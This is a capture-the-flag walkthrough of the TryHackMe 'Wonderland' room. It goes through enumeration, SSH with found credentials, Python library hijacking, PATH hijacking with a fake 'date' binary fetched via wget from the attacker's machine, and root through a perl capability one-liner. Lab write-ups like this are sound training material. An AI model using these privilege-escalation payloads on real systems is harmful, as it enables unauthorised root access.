THM - Wonderland

Linux | Python Library Hijacking | Search Order Hijacking | Lateral Movement | Capabilities

Techniques For This Room

Python Library Hijacking - Python will search for a module in directories following a specific order of priority - Inserting a malicious module earlier in the order results in it being prioritized and triggered - Detailed explanation
Search Order Hijacking - This involves forcing a system to run a malicious program instead of the intended one - This is done by placing the malicious program in a path which will be searched first before the intended program - Detailed explanation
Excellent Walkthrough - I used this walkthrough by Alexis Rodriguez which is very helpful

TL;DR / Executive Summary

Scan and enumerate with nmap and gobuster
Gain foothold by SSH-ing in and moving laterally across users
Privesc through capabilities

Scanning & Enumeration

Let's start with the usual nmap and gobuster scans

Nmap

nmap -sV -sC -vv <IP>

The following ports are open to us: 22: SSH 80: HTTP

Checking out port80 reveals this page:

Interesting. Looks like we'll have to...

gobuster

gobuster dir -u http://<IP> -w <wordlist>

We find an interesting directory called "/r":

Checking out directory "/r" gives us this page:

Considering we've been told to follow the white rabbit, and gobuster provided a directory named "/r", we can deduce that we should check out the following address <IP>/r/a/b/b/i/t.

That brings us to this page:

There's not much on the page itself, but checking out the page source gives us potential credentials!

Gaining Foothold

Let's try these credentials "alice:HowDothTheLittleCrocodileImproveHisShiningTail" with SSH.

ssh alice@<IP> -p 22

It works and we're in!

Checking out alice's files shows the root.txt, but we're unable to interact with it. However, the walrus_and_the_carpenter.py file looks interesting.

Another quick privesc check is to see what commands we are allowed to run using "sudo -l".

We see that we're able to run the python file from earlier, but as user rabbit. All roads seem to lead to the python file, so let's head over there.

Checking it out with python3 results in some lines from the poem.

Looking into the python file itself shows us that the file is designed to display a random paragraph.

Let's delve deeper into how this occurs. When this python file is run, the module random.py is imported, which prints a random paragraph. When python needs to import a module, Python has a set sequence of directories to search through for the requested module. The first directory will be the current directory. This means that if we create a malicious python module called random in our current directory, our module will be imported instead of the actual module. This is called Python Library Hijacking, and more information on it can be found here.

Now that we understand the process, let's create our random.py module.

nano random.py

In this module, we'll get it to open /bin/bash.

import os
os.system("/bin/bash")

Once that's done, let's run this as user rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

We've successfully moved laterally into user rabbit:

Now we'll try to get the user.txt flag. Admittedly, this will require some trial-and-error with witty interpretation of the hint provided. We see that the root.txt is in the user directory, when it usually is in the root directory. Also, the hint says that "everything is upside down here". We can guess that the user.txt could be in the root directory. Although we're unable to list the files in it, we can read the user.txt:

Now let's see how we can escalate our privileges. After some exploration, we find a file called teaParty highlighted in red.

We're unable to interact much with the file, but we can see what type of file teaParty is using the "file" command.

As we can see, it's in ELF (Executable and Linkable Format), which means we can execute it. Doing so shows us the following message:

An interesting point to note from the output is that the date and time printed are almost current. This could mean that there's a script pulling the date and time upon file execution. If we can have a peek inside the file, we may see if this is true:

Based on the section: ' && date --date='next hour' , we can confirm this. In a similar vein as Python Library Hijacking, we can use Search Order Hijacking to run our malicious "date" command instead of the actual date command. More information on Search Order Hijacking can be found here.

Let's create our "date" command:

nano date

Similar to earlier, we'll get it to open /bin/bash:

#!/bin/bash
/bin/bash

Now to grant it the necessary permissions:

chmod +x date

Lastly, we need to place our newly created "date" command in the PATH variable, so that it is run:

export PATH=/home/rabbit:$PATH

Alternative:

We can also create the malicious "date" command with c on our attacking machine:

#include.<unistd.h>

int main()

    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return (0);

Compile the above with c using this command:

gcc setuid.c -o date

Now transfer the "date" file over from the victim machine:

wget <yourIP>:<yourport>/date

Grant it the necessary permissions:

chmod +x date

place our "date" to ensure it runs before the default one:

export PATH=.:${PATH}

Now let's run the ELF file using "./teaParty". We have moved laterally again, and are now hatter!

Privilege Escalation

Let's explore and see what we find as hatter. We find a file called password.txt:

Looks like hatter's password is "WhyIsARavenLikeAWritingDesk?". Although we've moved laterally into hatter's account, we are still running rabbit's group ID and groups privileges. This may hinder our efforts to escalate to root.

So let's logout, and SSH back in with hatter's password:

ssh hatter@<IP> -p 22

Now that we have hatter's privileges, let's search for ways to privesc.

We run the usual privesc checks, but nothing works. Let's try one of the less common ones which involve exploiting capabilities. We can do this with this command:

getcap -r / 2>/dev/null

Some of the filetypes to look out for in capabilities are tar, perl, and python3. Here we see 3 results:

Running a quick "ls -la" on the 3 options, shows us if hatter has sufficient privileges to run them. Looks like we can run perl.

Time to check in with our trusty GTFObins on how to abuse this capability. We find that the following command can be used:

/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

That worked! We are now root.

And here's our root flag:

PreviousTHM - Jurassic Park NextTHM - Avengers Blog

Last updated 2 months ago

Was this helpful?